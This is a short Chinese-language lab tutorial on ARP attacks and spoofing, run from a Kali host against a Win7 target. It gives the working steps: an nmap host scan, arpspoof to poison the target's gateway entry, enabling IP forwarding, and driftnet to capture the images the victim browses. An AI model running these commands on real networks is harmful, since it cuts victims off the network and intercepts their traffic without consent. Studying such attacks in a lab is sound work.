ARP攻击与欺骗
信息收集:首先我们要知道 攻击者主机 和 靶机的 (IP,网关)
攻击者kali 主机的(IP,网关)
靶机(IP,网关)
用 nmap 工具扫描网段中的存活主机
环境
角色 系统 IP地址 网关 攻击者 kali 10.1.1.129 10.1.1.254 靶机 win7 10.1.1.131 10.1.1.254 kali上需要安装
dsniff
和driftnet
安装命令
apt-get install (dsniff 或 dirftnet)
ARP攻击(网段攻击)
arpspoof -i 网卡 -t 靶机ip 网关
此时靶机无法上网
原理:攻击者主机用上面的命令伪造成网关,靶机发的数据包都是攻击者主机收到,但没有处理,所有靶机无法上网
在这里我么们可以查看靶机的ARP 表
ARP欺骗
上面我们已经成功的伪造成靶机的网关了,现在只要路由转发靶机的数据就可以窃听到靶机的数据
(不能关掉输入“arpspoof -i 网卡 -t 靶机ip 网关”这个命令的窗口,也不能停掉)
-
开启路由转发功能 (1是开启,0是关闭)
echo 1 >/proc/sys/net/ipv4/ip_forward
-
打开窗口(只能查看对方浏览的图片)
driftnet -i eth0
eth0是网卡名称